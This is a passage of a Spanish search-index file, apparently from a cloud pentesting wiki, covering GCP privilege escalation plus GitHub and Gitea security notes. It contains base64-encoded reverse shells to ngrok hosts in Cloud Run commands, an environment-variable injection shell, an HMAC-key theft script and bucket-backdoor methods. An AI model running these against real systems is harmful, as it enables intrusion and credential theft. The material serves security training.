github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » GCP - Resourcemanager Privesc","id":"1037","title":"GCP - Resourcemanager Privesc"},"1038":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager","id":"1038","title":"resourcemanager"},"1039":{"body":"Al igual que en la explotación de iam.serviceAccounts.setIamPolicy, este permiso te permite modificar tus permisos contra cualquier recurso a nivel de organización . Así que, puedes seguir el mismo ejemplo de explotación.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.organizations.setIamPolicy","id":"1039","title":"resourcemanager.organizations.setIamPolicy"},"104":{"body":"Si se permiten todas las acciones (o una acción maliciosa), un usuario podría usar una acción de Github que es maliciosa y comprometer el contenedor donde se está ejecutando. caution Una acción maliciosa de Github ejecutada podría ser abusada por el atacante para: Robar todos los secretos a los que la acción tiene acceso Moverse lateralmente si la acción se ejecuta dentro de una infraestructura de terceros donde se puede acceder al token de SA utilizado para ejecutar la máquina (probablemente a través del servicio de metadatos) Abusar del token utilizado por el workflow para robar el código del repo donde se ejecuta la acción o incluso modificarlo .","breadcrumbs":"Github Security » Basic Github Information » Compromiso de Git Action","id":"104","title":"Compromiso de Git Action"},"1040":{"body":"Al igual que en la explotación de iam.serviceAccounts.setIamPolicy, este permiso te permite modificar tus permisos contra cualquier recurso a nivel de carpeta . Así que, puedes seguir el mismo ejemplo de explotación.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.folders.setIamPolicy","id":"1040","title":"resourcemanager.folders.setIamPolicy"},"1041":{"body":"Al igual que en la explotación de iam.serviceAccounts.setIamPolicy, este permiso te permite modificar tus permisos contra cualquier recurso a nivel de proyecto . Así que, puedes seguir el mismo ejemplo de explotación. tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.projects.setIamPolicy","id":"1041","title":"resourcemanager.projects.setIamPolicy"},"1042":{"body":"Reading time: 4 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » GCP - Ejecutar Privesc","id":"1042","title":"GCP - Ejecutar Privesc"},"1043":{"body":"Para más información sobre Cloud Run consulta: GCP - Cloud Run Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » Cloud Run","id":"1043","title":"Cloud Run"},"1044":{"body":"Un atacante con estos permisos para crear un servicio de ejecución que ejecute código arbitrario (contenedor Docker arbitrario), adjuntar una Cuenta de Servicio a él, y hacer que el código exfiltre el token de la Cuenta de Servicio de los metadatos . Un script de explotación para este método se puede encontrar aquí y la imagen de Docker se puede encontrar aquí . Ten en cuenta que al usar gcloud run deploy en lugar de solo crear el servicio necesita el permiso update . Consulta un ejemplo aquí .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.create , iam.serviceAccounts.actAs, run.routes.invoke","id":"1044","title":"run.services.create , iam.serviceAccounts.actAs, run.routes.invoke"},"1045":{"body":"Como el anterior pero actualizando un servicio: bash # Launch some web server to listen in port 80 so the service works\necho \"python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1\" | base64\n# cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== gcloud run deploy hacked \\\n--image=ubuntu:22.04 \\ # Make sure to use an ubuntu version that includes python3\n--command=bash \\\n--args=\"-c,echo cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== | base64 -d | bash\" \\\n--service-account=\"-compute@developer.gserviceaccount.com\" \\\n--region=us-central1 \\\n--allow-unauthenticated # If you don't have permissions to use \"--allow-unauthenticated\", dont use it","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.update , iam.serviceAccounts.actAs","id":"1045","title":"run.services.update , iam.serviceAccounts.actAs"},"1046":{"body":"Otórgate permisos previos sobre Cloud Run.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.setIamPolicy","id":"1046","title":"run.services.setIamPolicy"},"1047":{"body":"Lanza un trabajo con un shell inverso para robar la cuenta de servicio indicada en el comando. Puedes encontrar un exploit aquí . bash gcloud beta run jobs create jab-cloudrun-3326 \\\n--image=ubuntu:latest \\\n--command=bash \\\n--args=\"-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash\" \\\n--service-account=\"@$PROJECT_ID.iam.gserviceaccount.com\" \\\n--region=us-central1","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)","id":"1047","title":"run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)"},"1048":{"body":"Similar al anterior, es posible actualizar un trabajo y actualizar el SA , el comando y ejecutarlo : bash gcloud beta run jobs update hacked \\\n--image=mubuntu:latest \\\n--command=bash \\\n--args=\"-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash\" \\\n--service-account=-compute@developer.gserviceaccount.com \\\n--region=us-central1 \\\n--execute-now","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)","id":"1048","title":"run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)"},"1049":{"body":"Otórgate los permisos anteriores sobre Cloud Jobs.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.setIamPolicy","id":"1049","title":"run.jobs.setIamPolicy"},"105":{"body":"Las protecciones de ramas están diseñadas para no dar control completo de un repositorio a los usuarios. El objetivo es implementar varios métodos de protección antes de poder escribir código dentro de alguna rama . Las protecciones de ramas de un repositorio se pueden encontrar en https://github.com///settings/branches note No es posible establecer una protección de rama a nivel de organización . Por lo tanto, todas deben ser declaradas en cada repo. Se pueden aplicar diferentes protecciones a una rama (como a master): Puedes requerir un PR antes de fusionar (por lo que no puedes fusionar código directamente sobre la rama). Si esto se selecciona, se pueden implementar otras protecciones: Requerir un número de aprobaciones . Es muy común requerir que 1 o 2 personas más aprueben tu PR para que un solo usuario no pueda fusionar código directamente. Desestimar aprobaciones cuando se envían nuevos commits . De lo contrario, un usuario puede aprobar código legítimo y luego el usuario podría agregar código malicioso y fusionarlo. Requerir revisiones de los Propietarios de Código . Al menos 1 propietario de código del repo necesita aprobar el PR (por lo que los usuarios \"aleatorios\" no pueden aprobarlo). Restringir quién puede desestimar revisiones de solicitudes de extracción. Puedes especificar personas o equipos autorizados para desestimar revisiones de solicitudes de extracción. Permitir que actores especificados eviten los requisitos de solicitudes de extracción . Estos usuarios podrán eludir restricciones anteriores. Requerir que las verificaciones de estado pasen antes de fusionar. Algunas verificaciones deben pasar antes de poder fusionar el commit (como una acción de github que verifica que no haya ningún secreto en texto claro). Requerir resolución de conversaciones antes de fusionar . Todos los comentarios sobre el código deben ser resueltos antes de que el PR pueda ser fusionado. Requerir commits firmados . Los commits deben estar firmados. Requerir un historial lineal. Evitar que se envíen commits de fusión a ramas coincidentes. Incluir administradores . Si esto no está configurado, los administradores pueden eludir las restricciones. Restringir quién puede enviar a ramas coincidentes . Restringir quién puede enviar un PR. note Como puedes ver, incluso si lograste obtener algunas credenciales de un usuario, los repos pueden estar protegidos evitando que puedas enviar código a master por ejemplo para comprometer el pipeline de CI/CD.","breadcrumbs":"Github Security » Basic Github Information » Protecciones de Ramas","id":"105","title":"Protecciones de Ramas"},"1050":{"body":"Abusa de las variables de entorno de una ejecución de trabajo para ejecutar código arbitrario y obtener un shell inverso para volcar el contenido del contenedor (código fuente) y acceder al SA dentro de los metadatos: bash gcloud beta run jobs execute job-name --region --update-env-vars=\"PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)","id":"1050","title":"run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)"},"1051":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » Referencias","id":"1051","title":"Referencias"},"1052":{"body":"Reading time: 2 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » GCP - Secretmanager Privesc","id":"1052","title":"GCP - Secretmanager Privesc"},"1053":{"body":"Para más información sobre secretmanager: GCP - Secrets Manager Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager","id":"1053","title":"secretmanager"},"1054":{"body":"Esto te da acceso para leer los secretos del administrador de secretos y tal vez esto podría ayudar a escalar privilegios (dependiendo de qué información esté almacenada dentro del secreto): bash # Get clear-text of version 1 of secret: \"\"\ngcloud secrets versions access 1 --secret=\"\" Como esta también es una técnica de post explotación, se puede encontrar en: GCP - Secretmanager Post Exploitation","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager.versions.access","id":"1054","title":"secretmanager.versions.access"},"1055":{"body":"Esto te da acceso para leer los secretos del administrador de secretos, como usar: bash gcloud secrets add-iam-policy-binding \\\n--member=\"serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com\" \\\n--role=\"roles/secretmanager.secretAccessor\" tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager.secrets.setIamPolicy","id":"1055","title":"secretmanager.secrets.setIamPolicy"},"1056":{"body":"Reading time: 2 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » GCP - Serviceusage Privesc","id":"1056","title":"GCP - Serviceusage Privesc"},"1057":{"body":"Los siguientes permisos son útiles para crear y robar claves API, no esto de la documentación: Una clave API es una cadena encriptada simple que identifica una aplicación sin ningún principal . Son útiles para acceder a datos públicos de forma anónima , y se utilizan para asociar solicitudes API con tu proyecto para cuota y facturación . Por lo tanto, con una clave API puedes hacer que esa empresa pague por tu uso de la API, pero no podrás escalar privilegios. Para aprender sobre otros permisos y formas de generar claves API, consulta: GCP - Apikeys Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage","id":"1057","title":"serviceusage"},"1058":{"body":"Se encontró una API no documentada que se puede utilizar para crear claves API: bash curl -XPOST \"https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.apiKeys.create","id":"1058","title":"serviceusage.apiKeys.create"},"1059":{"body":"Se encontró otra API no documentada para listar las claves de API que ya han sido creadas (las claves de API aparecen en la respuesta): bash curl \"https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.apiKeys.list","id":"1059","title":"serviceusage.apiKeys.list"},"106":{"body":"https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise https://docs.github.com/en/enterprise-server https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards https://docs.github.com/en/actions/security-guides/encrypted-secrets tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"Github Security » Basic Github Information » Referencias","id":"106","title":"Referencias"},"1060":{"body":"Con estos permisos, un atacante puede habilitar y usar nuevos servicios en el proyecto. Esto podría permitir a un atacante habilitar servicios como admin o cloudidentity para intentar acceder a información de Workspace, o a otros servicios para acceder a datos interesantes.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.services.enable , serviceusage.services.use","id":"1060","title":"serviceusage.services.enable , serviceusage.services.use"},"1061":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ ¡Apoya a HackTricks y obtén beneficios! ¿Trabajas en una empresa de ciberseguridad ? ¿Quieres ver tu empresa anunciada en HackTricks ? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF ? ¡Consulta los PLANES DE SUSCRIPCIÓN ! Descubre La Familia PEASS , nuestra colección de NFTs exclusivos Obtén la merch oficial de PEASS y HackTricks Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦 @carlospolopm . Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks en github **** .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » Referencias","id":"1061","title":"Referencias"},"1062":{"body":"Reading time: 4 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » GCP - Sourcerepos Privesc","id":"1062","title":"GCP - Sourcerepos Privesc"},"1063":{"body":"Para más información sobre los Repositorios de Código consulta: GCP - Source Repositories Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Repositorios de Código","id":"1063","title":"Repositorios de Código"},"1064":{"body":"Con este permiso es posible descargar el repositorio localmente: bash gcloud source repos clone --project=","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.get","id":"1064","title":"source.repos.get"},"1065":{"body":"Un principal con este permiso podrá escribir código dentro de un repositorio clonado con gcloud source repos clone . Pero ten en cuenta que este permiso no se puede adjuntar a roles personalizados, por lo que debe otorgarse a través de un rol predefinido como: Owner Editor Source Repository Administrator (roles/source.admin) Source Repository Writer (roles/source.writer) Para escribir, simplemente realiza un git push regular.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.update","id":"1065","title":"source.repos.update"},"1066":{"body":"Con este permiso, un atacante podría otorgarse a sí mismo los permisos anteriores.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.setIamPolicy","id":"1066","title":"source.repos.setIamPolicy"},"1067":{"body":"Si el atacante tiene acceso a los secretos donde se almacenan los tokens, podrá robárselos. Para más información sobre cómo acceder a un secreto, consulta: GCP - Secretmanager Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Acceso a secretos","id":"1067","title":"Acceso a secretos"},"1068":{"body":"Es posible agregar claves ssh al proyecto de Source Repository en la consola web. Se realiza una solicitud POST a /v1/sshKeys:add y se puede configurar en https://source.cloud.google.com/user/ssh_keys Una vez que tu clave ssh esté configurada, puedes acceder a un repositorio con: bash git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ Y luego usa los comandos git como de costumbre.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Agregar claves SSH","id":"1068","title":"Agregar claves SSH"},"1069":{"body":"Es posible crear credenciales manuales para acceder a los Repositorios de Código Fuente: Al hacer clic en el primer enlace, te dirigirá a https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform&state&authuser=3 Lo que mostrará un mensaje de autorización Oauth para dar acceso a Google Cloud Development . Así que necesitarás ya sea las credenciales del usuario o una sesión abierta en el navegador para esto. Esto te enviará a una página con un script bash para ejecutar y configurar una cookie de git en $HOME/.gitcookies Al ejecutar el script, podrás usar git clone, push... y funcionará.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Credenciales Manuales","id":"1069","title":"Credenciales Manuales"},"107":{"body":"Reading time: 7 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"Gitea Security » Seguridad de Gitea","id":"107","title":"Seguridad de Gitea"},"1070":{"body":"Con este permiso es posible deshabilitar la protección predeterminada de los Repositorios de Código Fuente para no subir código que contenga Claves Privadas: bash gcloud source project-configs update --disable-pushblock También puedes configurar un tema pub/sub diferente o incluso desactivarlo por completo: bash gcloud source project-configs update --remove-topic=REMOVE_TOPIC\ngcloud source project-configs update --remove-topic=UPDATE_TOPIC tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.updateProjectConfig","id":"1070","title":"source.repos.updateProjectConfig"},"1071":{"body":"Reading time: 7 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » GCP - Storage Privesc","id":"1071","title":"GCP - Storage Privesc"},"1072":{"body":"Información Básica: GCP - Storage Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Almacenamiento","id":"1072","title":"Almacenamiento"},"1073":{"body":"Este permiso te permite descargar archivos almacenados dentro de Cloud Storage . Esto potencialmente te permitirá escalar privilegios porque en algunas ocasiones información sensible se guarda allí . Además, algunos servicios de GCP almacenan su información en buckets: GCP Composer : Cuando creas un Entorno de Composer, el código de todos los DAGs se guardará dentro de un bucket . Estas tareas pueden contener información interesante dentro de su código. GCR (Container Registry) : La imagen de los contenedores se almacena dentro de buckets , lo que significa que si puedes leer los buckets podrás descargar las imágenes y buscar leaks y/o código fuente .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.get","id":"1073","title":"storage.objects.get"},"1074":{"body":"Puedes darte permiso para abusar de cualquiera de los escenarios anteriores de esta sección .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.setIamPolicy","id":"1074","title":"storage.objects.setIamPolicy"},"1075":{"body":"Para un ejemplo de cómo modificar permisos con este permiso, consulta esta página: GCP - Public Buckets Privilege Escalation","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.buckets.setIamPolicy","id":"1075","title":"storage.buckets.setIamPolicy"},"1076":{"body":"La función de \"interoperabilidad\" de Cloud Storage, diseñada para interacciones entre nubes como con AWS S3, implica la creación de claves HMAC para Cuentas de Servicio y usuarios . Un atacante puede explotar esto generando una clave HMAC para una Cuenta de Servicio con privilegios elevados , así escalando privilegios dentro de Cloud Storage . Mientras que las claves HMAC asociadas a usuarios solo son recuperables a través de la consola web, tanto las claves de acceso como las secretas permanecen perpetuamente accesibles , lo que permite un posible acceso de respaldo al almacenamiento. Por otro lado, las claves HMAC vinculadas a Cuentas de Servicio son accesibles por API, pero sus claves de acceso y secretas no son recuperables después de la creación, añadiendo una capa de complejidad para el acceso continuo. bash # Create key\ngsutil hmac create # You might need to execute this inside a VM instance ## If you have TROUBLES creating the HMAC key this was you can also do it contacting the API directly:\nPROJECT_ID = '$PROJECT_ID'\nTARGET_SERVICE_ACCOUNT = f\"exam-storage-sa-read-flag-3@{PROJECT_ID}.iam.gserviceaccount.com\"\nACCESS_TOKEN = \"$CLOUDSDK_AUTH_ACCESS_TOKEN\"\nimport requests\nimport json\nkey = requests.post(\nf'https://www.googleapis.com/storage/v1/projects/{PROJECT_ID}/hmacKeys',\nparams={'access_token': ACCESS_TOKEN, 'serviceAccountEmail': TARGET_SERVICE_ACCOUNT}\n).json()\n#print(json.dumps(key, indent=4))\nprint(f'ID: {key[\"metadata\"][\"accessId\"]}')\nprint(f'Secret: {key[\"secret\"]}') # Configure gsutil to use the HMAC key\ngcloud config set pass_credentials_to_gsutil false\ngsutil config -a # Use it\ngsutil ls gs://[BUCKET_NAME] # Restore\ngcloud config set pass_credentials_to_gsutil true Otro script de explotación para este método se puede encontrar aquí .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.hmacKeys.create","id":"1076","title":"storage.hmacKeys.create"},"1077":{"body":"Para crear un nuevo objeto dentro de un bucket necesitas storage.objects.create y, según la documentación , también necesitas storage.objects.delete para modificar un objeto existente. Una explotación muy común de los buckets donde puedes escribir en la nube es en caso de que el bucket esté guardando archivos del servidor web , podrías ser capaz de almacenar nuevo código que será utilizado por la aplicación web.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.create, storage.objects.delete = Permisos de escritura en almacenamiento","id":"1077","title":"storage.objects.create, storage.objects.delete = Permisos de escritura en almacenamiento"},"1078":{"body":"Composer es Apache Airflow gestionado dentro de GCP. Tiene varias características interesantes: Se ejecuta dentro de un clúster GKE , por lo que el SA que utiliza el clúster es accesible por el código que se ejecuta dentro de Composer. Todos los componentes de un entorno de composer ( código de DAGs , plugins y datos) se almacenan dentro de un bucket de GCP. Si el atacante tiene permisos de lectura y escritura sobre él, podría monitorear el bucket y cada vez que se crea o actualiza un DAG, enviar una versión con puerta trasera para que el entorno de composer obtenga de almacenamiento la versión con puerta trasera. Puedes encontrar un PoC de este ataque en el repositorio: https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Composer","id":"1078","title":"Composer"},"1079":{"body":"El código de Cloud Functions se almacena en Storage y cada vez que se crea una nueva versión, el código se envía al bucket y luego se construye el nuevo contenedor a partir de este código. Por lo tanto, sobrescribir el código antes de que se construya la nueva versión es posible para hacer que la función en la nube ejecute código arbitrario . Puedes encontrar un PoC de este ataque en el repositorio: https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Cloud Functions","id":"1079","title":"Cloud Functions"},"108":{"body":"Gitea es una solución de hosting de código ligero gestionada por la comunidad y autoalojada escrita en Go.","breadcrumbs":"Gitea Security » ¿Qué es Gitea?","id":"108","title":"¿Qué es Gitea?"},"1080":{"body":"Las versiones de AppEngine generan algunos datos dentro de un bucket con el formato nombre: staging..appspot.com. Dentro de este bucket, es posible encontrar una carpeta llamada ae que contendrá una carpeta por versión de la aplicación AppEngine y dentro de estas carpetas será posible encontrar el archivo manifest.json. Este archivo contiene un json con todos los archivos que deben ser utilizados para crear la versión específica. Además, es posible encontrar los nombres reales de los archivos, la URL a ellos dentro del bucket de GCP (los archivos dentro del bucket cambiaron su nombre por su hash sha1) y el hash sha1 de cada archivo. Ten en cuenta que no es posible tomar el control de este bucket porque los usuarios de GCP no están autorizados a generar buckets utilizando el nombre de dominio appspot.com. Sin embargo, con acceso de lectura y escritura sobre este bucket, es posible escalar privilegios al SA adjunto a la versión de App Engine monitoreando el bucket y cada vez que se realiza un cambio (nueva versión), modificar la nueva versión lo más rápido posible. De esta manera, el contenedor que se crea a partir de este código ejecutará el código con puerta trasera. El ataque mencionado se puede realizar de muchas maneras diferentes, todos ellos comienzan monitoreando el bucket staging..appspot.com: Sube el código completo nuevo de la versión de AppEngine a un bucket diferente y disponible y prepara un archivo manifest.json con el nuevo nombre del bucket y los hashes sha1 de ellos . Luego, cuando se crea una nueva versión dentro del bucket, solo necesitas modificar el archivo manifest.json y subir el malicioso. Sube una versión modificada de requirements.txt que utilizará el código de dependencias maliciosas y actualiza el archivo manifest.json con el nuevo nombre de archivo, URL y el hash de este. Sube un archivo main.py o app.yaml modificado que ejecutará el código malicioso y actualiza el archivo manifest.json con el nuevo nombre de archivo, URL y el hash de este. Puedes encontrar un PoC de este ataque en el repositorio: https://github.com/carlospolop/Monitor-Backdoor-AppEngine","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » App Engine","id":"1080","title":"App Engine"},"1081":{"body":"Google Container Registry almacena las imágenes dentro de buckets, si puedes escribir en esos buckets podrías ser capaz de moverte lateralmente a donde se están ejecutando esos buckets. El bucket utilizado por GCR tendrá una URL similar a gs://.artifacts..appspot.com (Los subdominios de nivel superior están especificados aquí ). tip Este servicio está en desuso, por lo que este ataque ya no es útil. Además, Artifact Registry, el servicio que lo sustituye, no almacena las imágenes en buckets.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » GCR","id":"1081","title":"GCR"},"1082":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:~:text=apiKeys.-,create,privileges%20than%20our%20own%20user. tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Referencias","id":"1082","title":"Referencias"},"1083":{"body":"Reading time: 4 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o 